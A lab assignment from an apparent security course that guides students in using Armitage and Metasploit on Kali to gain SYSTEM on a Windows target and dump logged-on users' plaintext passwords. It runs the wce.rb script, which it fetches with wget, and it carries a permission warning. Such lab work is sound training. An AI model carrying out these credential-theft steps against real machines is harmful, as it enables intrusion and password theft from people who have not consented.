Project 5x: Stealing Windows Passwords Remotely (15 pts.)

What You Need

WARNING

This is a really powerful attack--you will steal the password right off the machine. Don't do this to anyone without permission, or you could get in big trouble!

Purpose

Windows stores the passwords of currently logged-on users in RAM without hashing them. This is a shockingly insecure practice.

You will use Armitage to take control of a Windows target remotely and steal the password over the network.

Downloading Required Files on the Kali Machine

At the upper left of the Kali desktop, click the little black icon to open a Terminal window.

In the Terminal window, execute these commands:

cd /usr/share/metasploit-framework/scripts/meterpreter

wget http://samsclass.info/120/proj/wce.rb

cp /usr/share/wce/wce32.exe /usr/share/metasploit-framework/data/post/wce-x86.exe

Exploit the Target with Armitage

As detailed previously, exploit the machine and get System privileges.

In Armitage, right-click the target and click "Meterpreter 1", Interact, "Meterpreter Shell", as shown below:

In the lower pane of Armitage, type this command:

getuid
You should see the response "Server username: NT AUTHORITY\SYSTEM", as shown below.

This means you have SYSTEM privileges, which are required for this attack.

In the lower pane of Armitage, type this command:

run wce.rb
You should see the password of "P@ssw0rd" in plaintext, as shown below:

Saving the Screen Image

Make sure the password is visible, as shown above.

Save a screen capture with a filename of "Proj 5x from YOUR NAME".

Turning In Your Project

Email the image to cnit.120@gmail.com with a subject of "Project 5x from YOUR NAME".

Sources

http://pastebin.com/kQ41wLM7

http://cyberarms.wordpress.com/2012/04/16/remotely-recovering-windows-passwords-in-pl/

http://averagesecurityguy.info/cheat-sheet/

Last modified: 6-6-13 6:38 am